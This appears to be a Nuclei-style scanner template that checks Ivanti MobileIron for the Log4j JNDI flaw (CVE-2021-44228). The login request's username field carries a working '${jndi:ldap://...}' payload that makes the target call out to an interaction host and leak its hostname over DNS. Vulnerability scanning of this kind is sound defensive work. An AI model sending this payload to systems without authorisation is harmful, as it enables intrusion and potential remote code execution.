48 lines
1.8 KiB
YAML
48 lines
1.8 KiB
YAML
id: mobileiron-log4j-jndi-rce
|
|
|
|
info:
|
|
name: Ivanti MobileIron Log4J JNDI RCE
|
|
author: meme-lord
|
|
severity: high
|
|
description: Ivanti MobileIron Apache Log4j2 <=2.14.1 JNDI in features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker
|
|
who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
|
|
- https://www.lunasec.io/docs/blog/log4j-zero-day/
|
|
- https://www.zdnet.com/article/mobileiron-customers-urged-to-patch-systems-due-to-potential-log4j-exploitation/
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
|
|
classification:
|
|
cve-id: CVE-2021-44228
|
|
remediation: Upgrade to version 2.14.2 or higher of MobileIron. If this is not possible, several Log4j exploit workarounds are available.
|
|
tags: jndi,log4j,rce,cve,cve2021
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /mifs/j_spring_security_check HTTP/1.1
|
|
Referer: {{RootURL}}/mifs/user/login.jsp
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: interactsh_request
|
|
group: 1
|
|
regex:
|
|
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
|
|
|
# Enhanced by cs on 2022/02/28
|